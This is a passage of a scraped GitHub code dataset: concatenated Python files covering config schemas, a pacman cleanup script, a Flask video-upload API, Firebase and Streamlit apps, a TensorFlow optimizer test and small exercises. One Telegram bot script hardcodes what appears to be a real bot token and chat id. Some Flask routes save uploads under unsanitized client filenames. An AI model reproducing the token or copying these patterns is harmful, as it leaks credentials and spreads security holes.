None\n for option in ['device', 'device_name']):\n raise ValidationError('you must provide device '\n 'or device_name')\n\n\nclass PasscodeSchema(BaseSchema):\n keypad_instance = String()\n timeout = Integer(missing=10)\n\n\nclass MetricsSchema(BaseSchema):\n host = String(missing='localhost')\n port = Integer(missing=8086)\n database = String(required=True)\n\n\nclass ActivitySchema(BaseSchema):\n interval = Integer(missing=10)\n extend = Integer(missing=10)\n limit = Integer(missing=120)\n cooldown = Integer(missing=30)\n\n\nclass MessagesSchema(BaseSchema):\n subscription = List(String())\n\n\nclass LedSchema(PinSchema):\n subscription = String(required=True)\n\n\nclass ControllerSchema(BaseSchema):\n passcode = String()\n passcode_instance = String()\n arm = Boolean(missing=False)\n mute = Boolean(missing=False)\n statefile = String()\n buzzer_pwm = String(missing='pwmchip0:0')\n arm_hotkey = String(\n validate=Regexp('([^:]+:)?KEY_.*'))\n\n\nclass PathSchema(BaseSchema):\n datadir = String(missing='.')\n\n\nclass CameraSchema(BaseSchema):\n res_hi_x = Integer(missing=800)\n res_hi_y = Integer(missing=600)\n res_lo_x = Integer(missing=320)\n res_lo_y = Integer(missing=240)\n res_image_x = Integer(missing=800)\n res_image_y = Integer(missing=600)\n framerate = Integer(missing=30)\n flip_x = Boolean(missing=False)\n flip_y = Boolean(missing=False)\n image_interval = Integer(missing=2)\n\n hires_bind_uri = String(\n missing='tcp://*:7710',\n validate=Regexp('^tcp://[^:]+:\\d+'))\n lores_bind_uri = String(\n missing='tcp://*:7711',\n validate=Regexp('^tcp://[^:]+:\\d+'))\n image_bind_uri = String(\n missing='tcp://*:7712',\n validate=Regexp('^tcp://[^:]+:\\d+'))\n\n\nclass RecordSchema(PathSchema):\n hires_connect_uri = String(\n missing='tcp://localhost:7710',\n validate=Regexp('^tcp://[^:]+:\\d+'))\n lores_connect_uri = String(\n missing='tcp://localhost:7711',\n validate=Regexp('^tcp://[^:]+:\\d+'))\n image_connect_uri = String(\n missing='tcp://localhost:7712',\n validate=Regexp('^tcp://[^:]+:\\d+'))\n\n framebuffer = Integer(missing=30)\n","repo_name":"larsks/zcam","sub_path":"zcam/schema/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42019568005","text":"#!/usr/bin/env python\n\nimport os,re, datetime\nd = '/var/lib/pacman/local'\n\npackages = os.listdir(d)\npackages.sort()\n\npkgname_search = re.compile('^(.*?)-[0-9]')\n\nold_packages = []\n\nfor pkg1 in packages:\n if pkg1 in old_packages:\n continue\n \n #get package name\n \n if not pkgname_search.findall(pkg1):\n print(pkg1 + \" .... skip\")\n continue\n pkgname = pkgname_search.findall(pkg1)[0]\n \n #look for other items with the same package name\n for pkg2 in packages:\n if pkg2 == pkg1:\n continue\n if pkg2 in old_packages:\n continue\n if not pkgname_search.findall(pkg2):\n print(pkg2 + \" .... 
skip\")\n continue\n if pkgname == pkgname_search.findall(pkg2)[0]:\n # We now have two duplicate packages, we want to delete the old one\n \n old_package = pkg1\n path1 = os.path.join(d,pkg1)\n path2 = os.path.join(d,pkg2)\n if os.stat(path1).st_mtime > os.stat(path2).st_mtime:\n old_package = pkg2\n \n old_packages.append(old_package)\n #print ('duplicate found:\\t')\n #print (pkg1)\n #print (pkg2)\n #print ('old:', old_package)\n \n oldpath = os.path.join(d,old_package)\n target = os.path.join('/var/lib/pacman/OLD',old_package)\n cmd = 'mv \"%s\" \"%s\"' % (oldpath, target)\n \n #double-check that the oldpath still exists (it may have been removed in a previous pass)\n if os.path.exists(oldpath):\n print(cmd)\n os.system(cmd)\n","repo_name":"sk1418/myConf","sub_path":"YK-Arch/bin/rmDupPacman.py","file_name":"rmDupPacman.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"31"} +{"seq_id":"73332127449","text":"import random\n\npoem = \"\"\"\nI have half my father's face\n& not a measure of his flair\nfor the dramatic. Never once\nhave I prayed & had another man's wife\nwail in return.\n\"\"\"\n \nlist_of_lines = poem.split(\"\\n\")\n\n# Your code should implement the lines_printed_backwards() function. \n# This function takes in a list of strings containing the lines of your \n# poem as arguments and will print the poem lines out in reverse with the line numbers reversed. \n\ndef lines_printed_backwards(list_of_lines):\n for lines in list_of_lines:\n list_of_lines.reverse()\n print(list_of_lines)\n\ndef lines_printed_random(list_of_lines):\n \"\"\"Your code should implement the lines_printed_random() function which will randomly select lines from a list of strings and print them out in random order. Repeats are okay and the number of lines printed should be equal to the original number of lines in the poem (line numbers don't need to be printed). Hint: try using a loop and randint()\"\"\"\n\n for lines in list_of_lines:\n print(random.choice(list_of_lines))\n\ndef my_costum_function(list_of_lines):\n \"\"\"\"Your code should implement a function of your choice that rearranges the poem in a unique way, be creative! 
Make sure that you carefully comment your custom function so it's clear what it does.\"\"\"\n # IT's going to delete the last line\n for lines in list_of_lines:\n list_of_lines.pop()\n print(list_of_lines)\n\nlines_printed_backwards(list_of_lines)\nlines_printed_random(list_of_lines)\nmy_costum_function(list_of_lines)\n","repo_name":"stark276/Backwards-Poetry","sub_path":"poetry.py","file_name":"poetry.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8328041528","text":"from http import HTTPStatus\nfrom flask import Blueprint, Flask, flash, request, redirect, url_for, send_file, send_from_directory, jsonify\nfrom flask.helpers import make_response\nfrom flasgger import swag_from\nfrom api.model.video import VideoModel\nfrom api.schema.video import VideoSchema\nfrom config import publicdir\nfrom controllers.ffmpeg_controller import FFMPEGController\nfrom datetime import datetime \n\nimport os\n\nvideo_api = Blueprint('video', __name__)\n\n@video_api.route('/saveFiles', methods=['POST'])\ndef saveFiles():\n video_file = request.files['video']\n video_file_ext = video_file.filename.split('.')[-1]\n video_file_name = datetime.now().strftime(\"%H:%M:%S\") + \"videofile.\" + video_file_ext\n video_file.save(os.path.join(publicdir, video_file_name))\n\n image_file = request.files['image']\n image_file_ext = image_file.filename.split('.')[-1]\n image_file_name = datetime.now().strftime(\"%H:%M:%S\") + \"imgfile.\" + image_file_ext\n image_file.save(os.path.join(publicdir, image_file_name))\n\n paths = {\n 'image_name' : image_file_name,\n 'video_name' : video_file_name\n }\n \n return jsonify(paths)\n\n@video_api.route('/getVideoFile', methods=['POST'])\ndef getVideoFile():\n videoName = request.form['videoName']\n return send_from_directory(publicdir, path=videoName, as_attachment=True)\n\n@video_api.route('/overlayImage', methods=['POST'])\ndef overlayImage():\n \"\"\"\n 1 liner about the route\n A more detailed description of the endpoint\n \"\"\"\n ffmpeg = FFMPEGController() \n\n image_file = request.files['image']\n video_file = request.files['video']\n positionX = request.form['positionX'] \n positionY = request.form['positionY'] \n\n image_file.save(os.path.join(publicdir, image_file.filename))\n video_file.save(os.path.join(publicdir, video_file.filename))\n\n #position image return url with created video\n final_video_filename = ffmpeg.overlayImage(publicdir + video_file.filename, publicdir + image_file.filename, positionX, positionY)\n return send_from_directory(publicdir, path=final_video_filename, as_attachment=True)\n\n\n@video_api.route('/createTemplateVideo', methods=['POST'])\ndef createTemplateVideo():\n ffmpeg = FFMPEGController() \n\n image_file = request.files['image']\n video_file = request.files['video']\n\n positionX = float(request.form['positionX']) \n positionY = float(request.form['positionY']) \n componentHeight = float(request.form['height'])\n componentWidth = float(request.form['width'])\n\n image_file.save(os.path.join(publicdir, image_file.filename))\n video_file.save(os.path.join(publicdir, video_file.filename))\n\n #position image return url with created video\n final_video_filename = ffmpeg.positionVideoInsideImage(\n publicdir + video_file.filename, publicdir + \n image_file.filename, \n positionX, \n positionY,\n componentHeight,\n componentWidth\n )\n \n return send_from_directory(publicdir, path=final_video_filename, as_attachment=True)\n\n 
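# A minimal sketch of a shared helper the routes above could use (the name
# `save_upload` is illustrative and not part of the original module): each route
# saves an upload and then rebuilds the same path by hand, so one function keeps
# the save path and the ffmpeg input path consistent.
def save_upload(file_storage):
    # file_storage is a Werkzeug FileStorage, as returned by request.files[...]
    path = os.path.join(publicdir, file_storage.filename)
    file_storage.save(path)
    return path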
 \n@video_api.route('/test', methods=[\"GET\"])\ndef test():\n    \"\"\"\n    API routing test\n    \"\"\"\n\n    result = VideoModel(\"path_to_video\")\n    return VideoSchema().dump(result), 200\n\n","repo_name":"somaestrategias/gdartes-videos","sub_path":"api/route/video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33588215007","text":"from google.appengine.ext import db\n\nimport hashlib\nimport simplejson\nimport settings\n\nclass Activity(db.Model):\n    '''\n    Key - id\n    '''\n    id = db.StringProperty()\n    shortcut = db.StringProperty()\n    username = db.StringProperty()\n    data = db.TextProperty()\n    title = db.StringProperty()\n    last_updated = db.DateTimeProperty(auto_now = True)\n    url = db.StringProperty()\n    replies_url = db.StringProperty()\n    likes_url = db.StringProperty()\n    \n    @staticmethod\n    def Get(*args, **kwargs):\n        q = db.Query(Activity)\n        \n        \n        # build the filter dynamically, have to watch out for index errors.\n        for key in kwargs:\n            if key in settings.FILTER_MAP:\n                newKey = settings.FILTER_MAP[key]\n                q = q.filter(\"%s =\" % newKey, kwargs[key])\n        \n        return q.get()\n    \n    @staticmethod\n    def Put(activity):\n        \n        m = hashlib.md5()\n        m.update(activity[\"id\"])\n        key = m.hexdigest()\n        \n        data = {\n            \"id\" : activity[\"id\"],\n            \"username\": activity[\"actor\"][\"profileUrl\"],\n            \"shortcut\" : key,\n            \"title\": activity[\"title\"],\n            \"data\" : simplejson.dumps(activity),\n            \"url\" : activity[\"links\"][\"self\"][0][\"href\"].replace(\"alt=json\", \"\"),\n            \"replies_url\" : activity[\"links\"][\"replies\"][0][\"href\"].replace(\"alt=json\", \"\"),\n            \"likes_url\" : activity[\"links\"][\"liked\"][0][\"href\"].replace(\"alt=json\", \"\")\n        }\n        \n        act = Activity.get_or_insert(key_name = key, **data)\n        ","repo_name":"PaulKinlan/commently","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"40096185808","text":"from flask_sqlalchemy import SQLAlchemy\nfrom random import randint\n\ndb = SQLAlchemy()\n\n# Family class\nclass FamilyStructure(db.Model): \n    id = db.Column(db.Integer, primary_key=True)\n    first_name = db.Column(db.String(120), unique=True, nullable=False)\n    last_name = db.Column(db.String(120), unique=True, nullable=False)\n    age = db.Column(db.Integer, nullable=False)\n    lucky_numbers = db.Column(db.String(120), nullable=False)\n    \n\n    def __init__(self, last_name): \n        self.last_name = last_name\n\n        # Example list of members\n        self._members = [\n            {\n                
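# Hard-coded sample members follow; each id comes from _generateId(), which draws
# randint(0, 7), so ids are not guaranteed to be unique across the seven entries.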
\"id\": self._generateId(),\n \"first_name\": \"Yarit\",\n \"last_name\": last_name,\n \"age\": '30',\n \"lucky_numbers\": [68, 21, 99]\n }\n ]\n\n def _generateId(self): \n\n return randint(0, 7)\n\n #Obtener miembro de la familia con id\n def get_member(self,id):\n\n for member in self._members:\n\n if member['id'] == int(id):\n return member\n\n return None\n\n def get_all_members(self):\n return self._members\n\nclass User(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n email = db.Column(db.String(120), unique=True, nullable=False)\n password = db.Column(db.String(80), unique=False, nullable=False)\n is_active = db.Column(db.Boolean(), unique=False, nullable=False)\n\n def __repr__(self):\n return '' % self.username\n\n def serialize(self):\n return {\n \"id\": self.id,\n \"email\": self.email,\n # do not serialize the password, its a security breach\n }","repo_name":"Shar1799/Family-Tree-Static-API","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10907482616","text":"from tensorflow import keras\nimport streamlit as st\nimport joblib\nimport numpy as np\nimport pandas as pd\n\n@st.cache_resource()\ndef load_model(model_path):\n try:\n model = keras.models.load_model(model_path)\n return model\n except Exception as e:\n print(f\"Error: {e}\")\n return None\n\ndef get_result(fail_val, success_val):\n if fail_val < success_val: return \"Can be Successful\"\n return \"No Guarantee of being Successful\"\n\n# UI\nst.title(\"Kickstarter Campaign success Predictor\")\n\nwith st.spinner(\"Loading Model...\"):\n model = load_model(\"./kickstarter_predictions.h5\")\n\nst.write(\"\"\"\n## Input your parameters and get the predicted result\n\"\"\")\n\nbackers = st.number_input(\"Backers\", step=1, value=0, min_value=0)\nlaunch_date = st.date_input(\"Campaign launch date\")\ndeadline = st.date_input(\"Campaign deadline\")\n\ngoal = st.number_input(\"Goal\")\npledged = st.number_input(\"Amount Pledged\")\n\n\ndef calculate_params(backers, launch_date, deadline, goal, pledged):\n scaler = joblib.load(\"scaler.gz\")\n print(scaler.get_params())\n pct = pledged / goal\n diff = deadline - launch_date\n data = pd.DataFrame([[backers, diff.days, pct]], columns=['Backers', 'Days', 'Percentage'])\n data[['Days', 'Backers']] = scaler.transform(data[['Days', 'Backers']])\n with st.spinner(\"Predicting...\"):\n pred = model.predict(data)\n print(pred)\n st.write(\"Prediction Result: \" + get_result(pred[0][0], pred[0][1]))\n \n\nst.button(\"Predict Result\", on_click=calculate_params, args=(backers, launch_date, deadline, goal,pledged)) ","repo_name":"abhirambsn/kickstarter_predictions","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24907918483","text":"import requests\n\ndef send_msg(text):\n\ttoken = \"1171072467:AAHqz6QI90f1KjLRybL8uwYRZblIzAYSSnQ\"\n\tchat_id = \"573611170\"\n\n\turl_req = \"https://api.telegram.org/bot\" + token + \"/sendMessage\" + \"?chat_id=\" + chat_id + \"&text=\" + text\n\tresults = requests.get(url_req)\n\treturn 
results\n\nsend_msg(\"\")","repo_name":"Shyam-V/car-theft-control","sub_path":"basic/Face_recognition_sample/telegram_bot.py","file_name":"telegram_bot.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29990468957","text":"# Rendering\nfrom jinja2 import Environment, FileSystemLoader\nimport pathlib\n\nenv = Environment(\n    loader=FileSystemLoader(pathlib.Path(__file__).parent.absolute().__str__() + '/templates'),\n    autoescape=False,\n    trim_blocks=True,\n    lstrip_blocks=True,\n)\n\nhpptemplate = env.get_template('hpp.jinja')\ncpptemplate = env.get_template('cpp.jinja')\n\n\ndef renderStructs(ast):\n    genStringTrees(ast)\n    return (hpptemplate.render(structs=ast['structs'], config=ast['config']),\n            cpptemplate.render(structs=ast['structs'], config=ast['config'], filename=ast['filename']))\n\n\ndef genStringTrees(ast):\n    for struct in ast['structs'].values():\n        struct['split'] = stringTree(struct['expose'])\n\n\nclass Bucket:\n    def __init__(self, mode, index):\n        self.mode = mode\n        self.index = index\n        self.buckets = {}\n\n    def insert(self, key, value):\n        if key not in self.buckets:\n            self.buckets[key] = []\n        self.buckets[key].append(value)\n\n    def singleton(self):\n        return len(self.buckets) < 2\n\n    def mbsize(self):\n        return max([len(sbucket) for sbucket in self.buckets.values()])\n\n\ndef stringTree(fields, key=None):\n    if len(fields) == 0:\n        return {'mode': 'empty'}\n    if len(fields) == 1:\n        return {'mode': 'singleton', 'key': key, 'value': fields[0]}\n\n    splits = []\n    letterSplits(fields, splits)\n    lengthSplits(fields, splits)\n\n    minSplit = min(splits, key=lambda bucket: bucket.mbsize())\n\n    return {\n        'mode': minSplit.mode,\n        'index': minSplit.index,\n        'key': key,\n        'buckets': [stringTree(bucket, key) for key, bucket in minSplit.buckets.items()],\n    }\n\n\ndef letterSplits(fields, splits):\n    length = min([len(value.name) for value in fields])\n    for i in range(length):\n        bucket = Bucket('letter', i)\n        for field in fields:\n            bucket.insert(\"'\" + field.name[i] + \"'\", field)\n        if not bucket.singleton():\n            splits.append(bucket)\n\n\ndef lengthSplits(fields, splits):\n    bucket = Bucket('length', 0)\n    for field in fields:\n        bucket.insert(len(field.name), field)\n    if not bucket.singleton():\n        splits.append(bucket)\n","repo_name":"dibidabidab/lua-serde","sub_path":"template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"33234113994","text":"def main():\r\n    \r\n    import firebase_admin\r\n    from firebase_admin import credentials\r\n    from firebase_admin import db\r\n    from firebase_admin import auth\r\n\r\n    cred = credentials.Certificate(\"library-project-firebase-adminsdk.json\")\r\n    libApp = firebase_admin.initialize_app(cred, {\r\n\t    'databaseURL':'https://library-project-9b912-default-rtdb.firebaseio.com/'\r\n\t    })\r\n\r\n    ref = db.reference(\"/Books\")\r\n\r\n    #bundle connection info for easier transport\r\n\r\n    #Initialize Function Dictionary\r\n    functions = {\"search\": search,\r\n                 \"remove\": remove,\r\n                 \"add\": add,\r\n                 \"changeBook\": changeBook,\r\n                 \"Help\": getHelp}\r\n\r\n    print(\"Welcome to the Library Database!\")\r\n    print(\"To get help, type, \\\"Help\\\" \")\r\n    while True:\r\n        inp = input(':')\r\n        (functions[inp])(ref)\r\n\r\ndef getHelp(ref):\r\n    print(\"commands: search, remove, add, changeBook, Help\")\r\n\r\ndef getBookInfo():\r\n    while True:\r\n        print(\"input data type followed by the data and then a comma: ex. Title Harry Potter, Author J.K. Rowling\")\r\n        \r\n        #gets the input and parses into list according to commas\r\n        bookInfo = input(\"input: \").split(\", \")\r\n        #Then splits each elements string further on their first space.\r\n        bookInfo = [i.split(\" \", 1) for i in bookInfo]\r\n        #Flattens list and returns it!\r\n        bookInfo = [item for sublist in bookInfo for item in sublist]\r\n\r\n        if len(bookInfo) < 2:\r\n            print(\"Not enough arguments\")\r\n            continue\r\n        #check if there are an even number of args\r\n        if len(bookInfo) % 2 != 0:\r\n            print(\"Odd number of arguments: missing an entry\")\r\n            continue\r\n        print(bookInfo)\r\n        return bookInfo\r\n    \r\n    \r\ndef search(ref):\r\n    searchInfo = getBookInfo()\r\n\r\n    print(\"Attempting to search...\")\r\n\r\n    #break search info into tuples\r\n    searchInfo = list(zip(searchInfo[0::2], searchInfo[1::2]))\r\n\r\n    #execute and retrieve results\r\n    books = ref.get()\r\n\r\n\r\n    \r\n    for key, value in books.items():\r\n        keep = True\r\n        for searchItem, searchValue in searchInfo:\r\n            try:\r\n                if str(searchValue) not in str(value[searchItem]):\r\n                    keep = False\r\n            except: \r\n                print(\"error on book\")\r\n                print(value)\r\n                keep = False\r\n        if keep:\r\n            print(value)\r\n\r\n\r\n\r\ndef remove(ref):\r\n    #Retrieve ISBN\r\n    isbn = input(\"What is the isbn of the book?: \")\r\n    #format\r\n    books = ref.get()\r\n    for key, value in books.items():\r\n        if value['ISBN'] == isbn:\r\n            ref.child(key).set({})\r\n            break\r\n    \r\n\r\ndef add(ref):\r\n    #retrieve book info\r\n    newBook = getBookInfo()\r\n\r\n    print(\"Attempting to add...\")\r\n\r\n    #slice the values (odd indices) and field names (even indices) from the list\r\n    values = newBook[1::2]\r\n    keys = newBook[0::2]\r\n\r\n    newBookDict = dict()\r\n\r\n    for i in range(0, len(values)):\r\n        newBookDict[keys[i]] = values[i]\r\n\r\n    #execute and commit\r\n    ref.push().set(newBookDict)\r\n    print(\"Success!\")\r\n\r\n\r\n\r\ndef changeBook(ref):\r\n    #Retrieve Book details\r\n    isbn = input(\"What is the ISBN of the book?: \")\r\n    info = getBookInfo()\r\n\r\n    fields = info[0::2]\r\n    values = info[1::2]\r\n    books = ref.get()\r\n\r\n    for key, value in books.items():\r\n        if value['ISBN'] == isbn:\r\n            for i in range(0, len(fields)):\r\n                print({str(fields[i]): values[i]})\r\n                ref.child(key).update({fields[i]: values[i]})\r\n\r\n    print(\"Success!\")\r\n\r\nif __name__ == \"__main__\":\r\n    main()","repo_name":"EverettButtars/LibraryFirebase","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":3649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36895308992","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\n\nfrom tensorflow.python.eager import context\nfrom tensorflow.python.framework import constant_op\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import test_util\nfrom tensorflow.python.keras.optimizer_v2 import adadelta\nfrom tensorflow.python.ops import embedding_ops\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.ops import resource_variable_ops\nfrom tensorflow.python.ops import variables\nfrom tensorflow.python.platform import test\n\n\nclass AdadeltaOptimizerTest(test.TestCase):\n\n  def doTestBasic(self, use_resource=False, use_callable_params=False):\n    num_updates = 4  # number of ADADELTA steps to perform\n    for dtype in 
[dtypes.half, dtypes.float32]:\n for grad in [0.2, 0.1, 0.01]:\n for lr in [1.0, 0.5, 0.1]:\n var0_init = [1.0, 2.0]\n var1_init = [3.0, 4.0]\n if use_resource:\n var0 = resource_variable_ops.ResourceVariable(\n var0_init, dtype=dtype)\n var1 = resource_variable_ops.ResourceVariable(\n var1_init, dtype=dtype)\n else:\n var0 = variables.Variable(var0_init, dtype=dtype)\n var1 = variables.Variable(var1_init, dtype=dtype)\n\n grads = constant_op.constant([grad, grad], dtype=dtype)\n\n accum = 0.0\n accum_update = 0.0\n\n # ADADELTA gradient optimizer\n rho = 0.95\n epsilon = 1e-8\n if use_callable_params:\n adadelta_opt = adadelta.Adadelta(\n learning_rate=lambda: lr, # pylint: disable=cell-var-from-loop\n rho=lambda: rho, # pylint: disable=cell-var-from-loop\n epsilon=epsilon) # pylint: disable=cell-var-from-loop\n else:\n adadelta_opt = adadelta.Adadelta(\n learning_rate=lr, rho=rho, epsilon=epsilon)\n if not context.executing_eagerly():\n adadelta_update = adadelta_opt.apply_gradients(\n zip([grads, grads], [var0, var1]))\n self.evaluate(variables.global_variables_initializer())\n\n # Assign slots\n slot = [None] * 2\n slot_update = [None] * 2\n slot[0] = adadelta_opt.get_slot(var0, \"accum_grad\")\n self.assertEqual(slot[0].shape, var0.shape)\n\n slot_update[0] = adadelta_opt.get_slot(var0, \"accum_var\")\n self.assertEqual(slot_update[0].shape, var0.shape)\n\n slot[1] = adadelta_opt.get_slot(var1, \"accum_grad\")\n self.assertEqual(slot[1].shape, var1.shape)\n\n slot_update[1] = adadelta_opt.get_slot(var1, \"accum_var\")\n self.assertEqual(slot_update[1].shape, var1.shape)\n\n # Fetch params to validate initial values\n self.assertAllClose(var0_init, self.evaluate(var0))\n self.assertAllClose(var1_init, self.evaluate(var1))\n\n update = [None] * num_updates\n tot_update = 0\n for step in range(num_updates):\n # Run adadelta update for comparison\n if not context.executing_eagerly():\n self.evaluate(adadelta_update)\n else:\n adadelta_opt.apply_gradients(zip([grads, grads], [var0, var1]))\n\n # Perform initial update without previous accum values\n accum = accum * rho + (grad**2) * (1 - rho)\n update[step] = (\n np.sqrt(accum_update + epsilon) *\n (1. 
/ np.sqrt(accum + epsilon)) * grad)\n accum_update = (\n accum_update * rho + (update[step]**2) * (1.0 - rho))\n tot_update += update[step] * lr\n\n if not context.executing_eagerly():\n # Check that the accumulators have been updated\n # TODO(lxuechen): This is hard to test in eager mode\n for slot_idx in range(2):\n self.assertAllCloseAccordingToType(\n np.array([accum, accum], dtype=dtype.as_numpy_dtype()),\n self.evaluate(slot[slot_idx]),\n rtol=1e-5)\n\n self.assertAllCloseAccordingToType(\n np.array(\n [accum_update, accum_update],\n dtype=dtype.as_numpy_dtype()),\n self.evaluate(slot_update[slot_idx]),\n rtol=1e-5)\n\n # Check that the parameters have been updated\n self.assertAllCloseAccordingToType(\n np.array(\n [var0_init[0] - tot_update, var0_init[1] - tot_update],\n dtype=dtype.as_numpy_dtype()),\n self.evaluate(var0),\n rtol=1e-5)\n\n self.assertAllCloseAccordingToType(\n np.array(\n [var1_init[0] - tot_update, var1_init[1] - tot_update],\n dtype=dtype.as_numpy_dtype()),\n self.evaluate(var1),\n rtol=1e-5)\n\n @test_util.run_in_graph_and_eager_modes(reset_test=True)\n def testResourceBasic(self):\n self.doTestBasic(use_resource=True)\n\n def testBasicCallableParams(self):\n with context.eager_mode():\n self.doTestBasic(use_resource=True, use_callable_params=True)\n\n @test_util.run_deprecated_v1\n def testMinimizeSparseResourceVariable(self):\n for dtype in [dtypes.half, dtypes.float32, dtypes.float64]:\n with self.cached_session():\n var0 = resource_variable_ops.ResourceVariable([[1.0, 2.0]], dtype=dtype)\n x = constant_op.constant([[4.0], [5.0]], dtype=dtype)\n\n def loss():\n pred = math_ops.matmul(embedding_ops.embedding_lookup([var0], [0]), x) # pylint: disable=cell-var-from-loop\n return pred * pred\n\n sgd_op = adadelta.Adadelta(1.0, 1.0, 1.0).minimize(\n loss, var_list=[var0])\n variables.global_variables_initializer().run()\n # Fetch params to validate initial values\n self.assertAllCloseAccordingToType([[1.0, 2.0]], self.evaluate(var0))\n # Run 1 step of sgd\n sgd_op.run()\n # Validate updated params\n self.assertAllCloseAccordingToType([[-111, -138]], self.evaluate(var0))\n\n def testConstructAdadeltaWithLR(self):\n opt = adadelta.Adadelta(lr=1.0, rho=0.9, epsilon=1.)\n opt_2 = adadelta.Adadelta(learning_rate=0.1, rho=0.9, epsilon=1., lr=1.0)\n opt_3 = adadelta.Adadelta(learning_rate=0.1, rho=0.9, epsilon=1.)\n self.assertIsInstance(opt.lr, variables.Variable)\n self.assertIsInstance(opt_2.lr, variables.Variable)\n self.assertIsInstance(opt_3.lr, variables.Variable)\n\n self.evaluate(variables.global_variables_initializer())\n self.assertAllClose(self.evaluate(opt.lr), (1.0))\n self.assertAllClose(self.evaluate(opt_2.lr), (1.0))\n self.assertAllClose(self.evaluate(opt_3.lr), (0.1))\n\n def testConstructAdadeltaWithEpsilonValues(self):\n opt = adadelta.Adadelta(epsilon=None)\n self.assertEqual(opt.epsilon, 1e-7)\n\n opt = adadelta.Adadelta(epsilon=1e-8)\n self.assertEqual(opt.epsilon, 1e-8)\n\n\nif __name__ == \"__main__\":\n test.main()\n","repo_name":"DeepRec-AI/DeepRec","sub_path":"tensorflow/python/keras/optimizer_v2/adadelta_test.py","file_name":"adadelta_test.py","file_ext":"py","file_size_in_byte":7154,"program_lang":"python","lang":"en","doc_type":"code","stars":895,"dataset":"github-code","pt":"31"} +{"seq_id":"34452490314","text":"# Exercise 8a\n\n# Going back to the E-less book, write a function that takes a list of words\n# and returns only those words that contain no E's.\n# An outline of the function has been supplied for you.\n\nimport re\ndef 
remove_e_words(wordlist):\n    non_e_words = list()\n    for word in wordlist:\n        if re.search(r'^[^eE]+$', word): # replace the ellipsis with your code\n            non_e_words.append(word)\n    return non_e_words\n\nassert remove_e_words(['Acorn','Bread','Cornflakes','Dairy','Elephant ears']) \\\n    == ['Acorn', 'Dairy']\n# will print nothing if successful\n\n# Discuss: does it make sense to use re.match or re.search in this instance?\n","repo_name":"michelleful/RegexTutorial","sub_path":"exercises/ex8a.py","file_name":"ex8a.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"5230920870","text":"import pandas as pd\nfrom pandas import DataFrame\n\nfrom src.cluster_analysis import ClusterAnalysis\nfrom src.cluster_analysis_use_scholarly_output import ClusterAnalysisUseScholarlyOutput\nfrom src.cluster_analysis_use_share import ClusterAnalysisUseShare\nfrom src.counter import Counter\n\n\ndef main():\n    df: DataFrame = pd.read_excel(\"data/Германия.xlsx\")\n    fwci: float = 1\n    # To use the share of publications, use the ClusterAnalysisUseShare class\n    # To use the number of publications, use the ClusterAnalysisUseScholarlyOutput class\n\n    cl = ClusterAnalysisUseShare(df, fwci, 0.0005)\n    avr_fwci = cl.get_average_fwci()\n    proportion_list = cl.get_proportion()\n\n    counter_d: Counter = cl.get_d(fwci, proportion_list)\n    counter_e: Counter = cl.get_e(fwci, proportion_list)\n    counter_g: Counter = cl.get_g(fwci, proportion_list)\n    counter_f: Counter = cl.get_f(fwci, proportion_list)\n    print(f\"A find\\n{counter_d}\")\n    print(f\"B find\\n{counter_e}\")\n    print(f\"C find\\n{counter_g}\")\n    print(f\"D find\\n{counter_f}\")\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"nerudxlf/scival-cluster-analysis","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27620202441","text":"\r\nfrom typing import List, Dict\r\n\r\ndef valeur_decomposition(decomp: Dict[int, int]) -> int:\r\n    \"\"\"Return the value of the factor-decomposition dictionary\"\"\"\r\n    res: int = 1\r\n    e: int\r\n    for e in decomp:\r\n        res = res*e**decomp[e]\r\n    return res\r\n\r\nassert valeur_decomposition({2:1, 3:1, 5:1}) == 30\r\nassert valeur_decomposition({2:3, 7:1}) == 56\r\nassert valeur_decomposition({2:10}) == 1024\r\n\r\ndef decomposition(l: List[int]) -> Dict[int, int]:\r\n    \"\"\"Return the dictionary that decomposes the product of factors\"\"\"\r\n    res: Dict[int, int] = dict()\r\n    e: int\r\n    for e in l:\r\n        if e not in res:\r\n            res[e] = 0\r\n        res[e] = res[e]+1\r\n    return res\r\n\r\nassert decomposition([2, 3, 5]) == {2: 1, 3: 1, 5: 1}\r\nassert decomposition([2, 2, 2, 7]) == {2: 3, 7: 1}\r\nassert decomposition([2, 2, 2, 2, 2, 2, 2, 2, 2, 2]) == {2: 10}\r\n\r\ndef liste_nombres_premiers(n: int) -> List[int]:\r\n    \"\"\"Precondition: n 